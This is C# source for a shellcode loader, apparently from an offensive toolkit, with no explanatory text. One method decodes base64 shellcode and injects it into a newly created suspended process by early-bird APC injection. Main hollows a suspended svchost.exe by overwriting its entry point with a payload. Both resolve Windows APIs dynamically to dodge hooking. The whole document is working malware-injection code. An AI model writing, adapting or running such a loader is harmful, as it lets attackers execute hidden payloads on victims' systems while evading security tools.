public static void Exec(string a, string b)
{
byte[] shellcode = System.Convert.FromBase64String(a);
string processPath = b;
STRUCTS.STARTUPINFO si = new STRUCTS.STARTUPINFO();
STRUCTS.PROCESS_INFORMATION pi = new STRUCTS.PROCESS_INFORMATION();
IntPtr pointer = TinySharpSploit.GetLibraryAddress("kernel32.dll", "CreateProcessA");
DELEGATES.CreateProcess CreateProcess = Marshal.GetDelegateForFunctionPointer(pointer, typeof(DELEGATES.CreateProcess)) as DELEGATES.CreateProcess;
bool success = CreateProcess(processPath, null, IntPtr.Zero, IntPtr.Zero, false, STRUCTS.ProcessCreationFlags.CREATE_SUSPENDED, IntPtr.Zero, null, ref si, out pi);
pointer = TinySharpSploit.GetLibraryAddress("kernel32.dll", "VirtualAllocEx");
DELEGATES.VirtualAllocEx virtualAllocEx = Marshal.GetDelegateForFunctionPointer(pointer, typeof(DELEGATES.VirtualAllocEx)) as DELEGATES.VirtualAllocEx;
IntPtr alloc = virtualAllocEx(pi.hProcess, IntPtr.Zero, (uint)shellcode.Length, 0x1000 | 0x2000, 0x40);
pointer = TinySharpSploit.GetLibraryAddress("kernel32.dll", "WriteProcessMemory");
DELEGATES.WriteProcessMemory writeProcessMemory = Marshal.GetDelegateForFunctionPointer(pointer, typeof(DELEGATES.WriteProcessMemory)) as DELEGATES.WriteProcessMemory;
writeProcessMemory(pi.hProcess, alloc, shellcode, (uint)shellcode.Length, out UIntPtr bytesWritten);
pointer = TinySharpSploit.GetLibraryAddress("kernel32.dll", "OpenThread");
DELEGATES.OpenThread openThread = Marshal.GetDelegateForFunctionPointer(pointer, typeof(DELEGATES.OpenThread)) as DELEGATES.OpenThread;
IntPtr tpointer = openThread(STRUCTS.ThreadAccess.SET_CONTEXT, false, (int)pi.dwThreadId);
uint oldProtect = 0;
pointer = TinySharpSploit.GetLibraryAddress("kernel32.dll", "VirtualProtectEx");
DELEGATES.VirtualProtectEx virtualProtectEx = Marshal.GetDelegateForFunctionPointer(pointer, typeof(DELEGATES.VirtualProtectEx)) as DELEGATES.VirtualProtectEx;
virtualProtectEx(pi.hProcess, alloc, shellcode.Length, 0x20, out oldProtect);
pointer = TinySharpSploit.GetLibraryAddress("kernel32.dll", "QueueUserAPC");
DELEGATES.QueueUserAPC queueUserAPC = Marshal.GetDelegateForFunctionPointer(pointer, typeof(DELEGATES.QueueUserAPC)) as DELEGATES.QueueUserAPC;
queueUserAPC(alloc, tpointer, IntPtr.Zero);
pointer = TinySharpSploit.GetLibraryAddress("kernel32.dll", "ResumeThread");
DELEGATES.ResumeThread resumeThread = Marshal.GetDelegateForFunctionPointer(pointer, typeof(DELEGATES.ResumeThread)) as DELEGATES.ResumeThread;
resumeThread(pi.hThread);
}
static void Main(string[] args)
{
IntPtr pointer = Invoke.GetLibraryAddress("kernel32.dll", "CreateProcessA");
DELEGATES.CreateProcess CreateProcess = Marshal.GetDelegateForFunctionPointer(pointer, typeof(DELEGATES.CreateProcess)) as DELEGATES.CreateProcess;
pointer = Invoke.GetLibraryAddress("Ntdll.dll", "ZwQueryInformationProcess");
DELEGATES.ZwQueryInformationProcess ZwQueryInformationProcess = Marshal.GetDelegateForFunctionPointer(pointer, typeof(DELEGATES.ZwQueryInformationProcess)) as DELEGATES.ZwQueryInformationProcess;
pointer = Invoke.GetLibraryAddress("kernel32.dll", "ReadProcessMemory");
DELEGATES.ReadProcessMemory ReadProcessMemory = Marshal.GetDelegateForFunctionPointer(pointer, typeof(DELEGATES.ReadProcessMemory)) as DELEGATES.ReadProcessMemory;
pointer = Invoke.GetLibraryAddress("kernel32.dll", "WriteProcessMemory");
DELEGATES.WriteProcessMemory WriteProcessMemory = Marshal.GetDelegateForFunctionPointer(pointer, typeof(DELEGATES.WriteProcessMemory)) as DELEGATES.WriteProcessMemory;
pointer = Invoke.GetLibraryAddress("kernel32.dll", "ResumeThread");
DELEGATES.ResumeThread ResumeThread = Marshal.GetDelegateForFunctionPointer(pointer, typeof(DELEGATES.ResumeThread)) as DELEGATES.ResumeThread;
STRUCTS.STARTUPINFO si = new STRUCTS.STARTUPINFO();
STRUCTS.PROCESS_INFORMATION pi = new STRUCTS.PROCESS_INFORMATION();
STRUCTS.SECURITY_ATTRIBUTES lpa = new STRUCTS.SECURITY_ATTRIBUTES();
STRUCTS.SECURITY_ATTRIBUTES lta = new STRUCTS.SECURITY_ATTRIBUTES();
STRUCTS.PROCESS_BASIC_INFORMATION pbi = new STRUCTS.PROCESS_BASIC_INFORMATION();
uint temp = 0;
bool succ = CreateProcess(null, "C:\\windows\\system32\\svchost.exe", ref lpa, ref lta, false, STRUCTS.ProcessCreationFlags.CREATE_SUSPENDED, IntPtr.Zero, null, ref si, out pi);
/* if (succ)
* {
* Console.WriteLine("Process Created");
* Console.WriteLine(" |Process ID->" + pi.dwProcessId);
* }
*/
UInt32 success = ZwQueryInformationProcess(pi.hProcess, 0x0, ref pbi, (uint)(IntPtr.Size * 6), ref temp);
IntPtr ptrToBaseImage = (IntPtr)((Int64)pbi.PebBaseAddress + 0x10);
byte[] addrBuf = new byte[IntPtr.Size];
IntPtr nread = IntPtr.Zero;
succ = ReadProcessMemory(pi.hProcess, ptrToBaseImage, addrBuf, addrBuf.Length, out nread);
/* if (succ)
* {
* Console.WriteLine("Process Read");
* }
*/
IntPtr processBase = (IntPtr)BitConverter.ToInt64(addrBuf, 0);
byte[] data = new byte[0x200];
ReadProcessMemory(pi.hProcess, processBase, data, data.Length, out nread);
uint e_lfanew_offset = BitConverter.ToUInt32(data, 0x3c);
uint opthdr = e_lfanew_offset + 0x28;
uint entrypoint_rva = BitConverter.ToUInt32(data, (int)opthdr);
IntPtr addressofentrypoint = (IntPtr)(entrypoint_rva + (UInt64)processBase);
WriteProcessMemory(pi.hProcess, addressofentrypoint, buf(), buf().Length, out nread);
ResumeThread(pi.hThread);
}
